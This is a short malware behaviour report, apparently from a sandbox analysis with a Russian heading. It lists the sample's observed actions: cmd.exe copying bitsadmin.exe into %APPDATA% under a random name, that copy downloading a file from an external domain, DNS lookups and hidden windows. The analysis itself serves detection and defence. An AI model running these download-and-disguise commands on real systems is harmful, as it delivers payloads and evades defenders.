Техническая информация
- '%APPDATA%\fnzxar.exe' /transfer IfPXak /download https://traquick.com/nesq/03012341206/map.gif %APPDATA%\map.gif
- %APPDATA%\fnzxar.exe
- 'tr###ick.com':443
- DNS ASK tr###ick.com
- 'localhost':65175
- 'localhost':65456
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\fnzxAr.exe' (со скрытым окном)
- '%APPDATA%\fnzxar.exe' /transfer IfPXak /download https://traquick.com/nesq/03012341206/map.gif %APPDATA%\map.gif' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\fnzxAr.exe